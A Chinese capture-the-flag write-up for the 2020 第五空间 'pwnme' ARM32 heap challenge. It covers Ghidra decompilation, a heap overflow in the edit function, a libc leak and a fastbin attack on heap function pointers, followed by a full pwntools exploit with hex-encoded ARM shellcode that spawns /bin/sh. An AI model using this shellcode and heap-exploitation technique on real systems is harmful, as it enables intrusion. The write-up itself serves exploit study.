2020年第五空间-pwnme
June 28, 2020 CTF-Writeup 访问: 36 次
pwnme
一个arm32 pwn,而且还是堆题
我用的工具是ghidra,arm的题用ida不是太舒服
动态调试,用qemu运行这个程序的时候,显示libc库错误,解决方法就是把libc.so文件重新链接一下(ln -s)
main函数分析:
void FUN_00010aa8(void)
{
char acStack24 [8];
int local_10;
code **local_c;
setvbuf(stdout,(char *)0x0,2,0);
setvbuf(stdin,(char *)0x0,2,0);
local_c = (code **)malloc(8);
*local_c = FUN_0001058c;
local_c[1] = FUN_000105a8;
(**local_c)();
meau();
read(0,acStack24,8);
local_10 = atoi(acStack24);
switch(local_10) {
case 1:
show();
break;
case 2:
add();
break;
case 3:
edit();
break;
case 4:
delete();
break;
case 5:
(*local_c[1])();
/* WARNING: Subroutine does not return */
exit(0);
default:
puts("Invalid");
}
}
函数首先申请了8字节的堆块,里面存放了两个函数的地址(函数都是只输出一句话),然后有五个选项:
void meau(void)
{
puts("----------------------------");
puts("Normal Menu");
puts("----------------------------");
puts("1.Show");
puts("2.Add");
puts("3.Change");
puts("4.Remove");
puts("5.Exit");
puts("----------------------------");
printf(">>> ");
return;
}
审计后发现在edit里面存在任意长度输入而造成堆溢出,起初我按照glibc利用手法,先进行堆块重叠,可以泄露出来libc,然后我想利用fastbin attack来修改hook,搜了一番在arm架构下并没有__malloc_hook和__free_hook,然后我想到main函数开始的时候在堆中存了两个地址,然后想fastbin attack来修改这两个地址,利用的时候,发现在fastbin中链表和glibc下的不一样
0x22150: 0x0000001100000000 0x0000000000000022
0x22160: 0x0000001100000000 0x0000000000000a22
0x22170: 0x0000001100000000 0x0000000000022172
0x22180: 0x0000001100000000 0x0000000000000a44
0x22190: 0x0000001100000000 0x0000000000022152
0x221a0: 0x0000001100000000 0x0000000000000a66
0x221b0: 0x00000e5100000000 0x0000000000000000
0x2106c: 0x00022018 0x00000038 0x00022058 0x00000038
0x2107c: 0x00022098 0x00000038 0x000220d8 0x00000038
0x2108c: 0x00022098 0x00000038 0x00022118 0x00000000
0x2109c: 0x00000000 0x00000008 0x00022168 0x00000000
0x210ac: 0x00000000 0x00000008 0x00022188 0x00000000
0x210bc: 0x00000000 0x00000008 0x000221a8 0x00000000
0x210cc: 0x00000000 0x00000000 0x00000000 0x00000000
然后动态调试,尝试构造出能够分配到两个函数指针的地方,最后可以修改到,伪造的数值是一个一个根据偏移试的,然后没有one_gg,想着在堆里写入shellcode,然后把函数指针写成堆上的地址,再利用选项5来调用
exp:
from pwn import *
context.binary = "./a.out"
context.log_level='debug'
libc = ELF("./lib/libuClibc-1.0.34.so")
'''
if local:
p = remote("106.75.126.171","33865")
elif debug:
p = process(["qemu-aarch64", "-g", "1234", "-L", "/usr/aarch64-linux-gnu", "baby_arm"])
else:
p = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu", "baby_arm"])
'''
# r = remote("121.36.58.215","1337")
# r = process(["qemu-arm", "-g", "1234", "-L", ".", "./a.out"])
r = process(["qemu-arm", "-L", ".", "./a.out"])
# r = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu", "baby_arm"])
sl = lambda x : r.sendline(x)
sd = lambda x : r.send(x)
sla = lambda x,y : r.sendlineafter(x,y)
rud = lambda x : r.recvuntil(x,drop=True)
ru = lambda x : r.recvuntil(x)
li = lambda name,x : log.info(name+':'+hex(x))
ri = lambda : r.interactive()
def add(chunk_size,value):
ru('>>> ')
sl('2')
ru('Length:')
sl(str(chunk_size))
ru('Tag:')
sl(value)
def delete(index):
ru('>>> ')
sl('4')
ru('Tag:')
sl(str(index))
def show():
ru('>>> ')
sl('1')
def edit(index,len,value):
ru('>>> ')
sl('3')
ru('Index:')
sl(str(index))
ru('Length:')
sl(str(len))
ru("Tag:")
sl(value)
def debug():
gdb.attach(r)
raw_input()
add(0x38,"aaa")
add(0x38,"aaa")
add(0x38,"aaa")
add(0x38,"aaa")
edit(0,0x49,"\x11"*0x38+p32(0)+p32(0x81)+"\x22"*8)
delete(1)
add(0x38,"aaa")
show()
ru("2 : ")
libc_base = u32(r.recv(4))-0x9a8ec
system = libc_base + libc.symbols['system']
li("libc_base",libc_base)
li("system",system)
li("stack",libc.symbols['environ']+libc_base)
add(0x38,"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x03\xa0\x52\x40\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x7f\x40\x2f\x62\x69\x6e\x2f\x73\x68\x41")
add(0x38,"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x03\xa0\x52\x40\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x7f\x40\x2f\x62\x69\x6e\x2f\x73\x68\x41")
add(8,"\x11")#6
add(8,"\x22")#7
add(8,"\x33")#8
add(8,"\x44")#9
add(8,"\x55")#10
add(8,"\x66")#11
delete(6)
delete(8)
delete(10)
add(8,"\x99")
edit(7,0x20,"a"*8+p32(0)+p32(0x11)+p32(0x22022))
add(8,"\x99")
# add(8,p32(0x51800+libc_base)+p32(0x51800+libc_base))
ru('>>> ')
sl('2')
ru('Length:')
sl(str(8))
ru('Tag:')
sd(p32(0x22098)+p32(0x22098))
# shellcode = asm(shellcraft.aarch64.sh())
# edit(6,0x20,"a"*0x8+p32(0)+p32(0x11)+p32(0x22008))
ru('>>> ')
sl("5")
# show()
ri()
赛后看别人wp,说arm下 fastbin的链表fd指针是异或的